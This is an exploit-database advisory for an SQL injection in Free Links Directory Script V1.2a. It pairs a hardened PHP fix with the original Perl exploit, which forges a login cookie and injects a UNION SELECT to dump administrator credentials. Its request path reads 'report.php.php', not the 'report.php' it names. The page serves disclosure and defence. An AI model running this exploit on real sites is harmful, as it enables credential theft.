Vendor: Free Links Directory Script
Author: ka0x
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Free Links Directory Script
Affected Version From: V1.2a
Affected Version To: V1.2a
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Date: 2008

Free Links Directory Script V1.2a Remote SQL Injection Exploit

This exploit allows an attacker to read the username and password of the administrator of Free Links Directory Script V1.2a. The vulnerability exists because 'report.php' performs no input validation on the 'linkid' GET parameter and interpolates it directly into an SQL query. The script's only access check is that the 'logged' cookie is non-empty, so the exploit sends a crafted HTTP request with the header 'Cookie: logged=d0ml4bs' (any non-empty value satisfies the check) and a UNION-based SQL injection payload in 'linkid', which makes the query return the administrator's username and password in the response.

Mitigation:

Input validation should be implemented on the 'linkid' parameter (and on any other request data that reaches an SQL query) to prevent SQL injection attacks.
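Added example, not the vendor's code and not part of the original advisory: a hardened rewrite of the report.php fragment quoted in the exploit's header comments. It keeps the 'links' table and 'id' column from the page; the mysqli connection in $db, the use of PHP sessions with an 'admin_id' key for login state, and the login.php redirect target are assumptions made for the example.

```php
<?php
// Hardened version of the report.php fragment shown in the exploit header.
// Added example: not the vendor's code. Assumes a mysqli connection in $db
// (assumption) and that successful login stores $_SESSION['admin_id'] (assumption).
session_start();

// 1. Authentication: require server-side session state. The original only
//    tested $_COOKIE['logged'] != "", so any client-chosen value passed.
if (empty($_SESSION['admin_id'])) {
    header('Location: login.php');   // assumed login page
    exit;
}

// 2. Input validation: 'linkid' is a row id, so it must be a positive integer.
//    filter_input() returns false for non-integers and null if the parameter is absent.
$linkid = filter_input(
    INPUT_GET,
    'linkid',
    FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]
);
if ($linkid === false || $linkid === null) {
    http_response_code(400);
    exit('invalid linkid');
}

// 3. Parameterized query: the value is bound as an integer, never concatenated
//    into the SQL text, so a UNION or comment sequence cannot alter the statement.
$stmt = $db->prepare('SELECT * FROM links WHERE id = ?');
$stmt->bind_param('i', $linkid);
$stmt->execute();
$linkinfo = $stmt->get_result()->fetch_assoc();
$stmt->close();

if ($linkinfo === null) {
    http_response_code(404);
    exit('no such link');
}
// ... continue with $linkinfo as the original script did
```

The integer cast alone would block the payload on this page, but binding the value through a prepared statement is the general fix and does not depend on remembering to cast every parameter. The session check addresses the separate weakness in the quoted code, where the mere presence of a 'logged' cookie was accepted as proof of login. Since the page records "Patch Exists: NO", this is illustrative hardening, not a vendor fix.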

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# Free Links Directory Script V1.2a Remote SQL Injection Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# D.O.M Labs Security Researchers
# - www.domlabs.org -
#
# Vuln code (report.php):
#
# if($_COOKIE['logged']=="") {
# [...] // login
# else {
#     $linkida = $_GET['linkid'];
#     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
# [...]
#

use strict;
use LWP::UserAgent;
 
my $host = $ARGV[0];

die "[*] usage: perl $0 <host>\n" unless $ARGV[0];

if ($host !~ /^http:/){ $host = 'http://'.$host; }

my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ;
$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs

my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");

my $res = $ua->request($req);
my $con = $res->content;

if ($res->is_success && $con =~ m/____(.*?)____/ms){
    print $1;
}
else {
    print "[-] exploit failed!\n";
}

__END__

# milw0rm.com [2008-12-16]